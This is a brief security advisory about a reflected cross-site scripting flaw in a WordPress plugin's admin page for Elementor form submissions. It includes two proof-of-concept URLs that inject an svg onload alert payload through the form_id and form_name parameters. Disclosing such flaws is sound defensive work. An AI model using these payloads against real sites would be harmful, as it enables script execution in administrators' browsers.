The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
When there is at least one submission:
https://example.com/wp-admin/edit.php?post_type=elementor_cf_db&page=sb_elem_cfd&form_id="><svg/onload=alert(/XSS-id/)>
https://example.com/wp-admin/edit.php?post_type=elementor_cf_db&page=sb_elem_cfd&form_name="><svg/onload=alert(/XSS-name/)>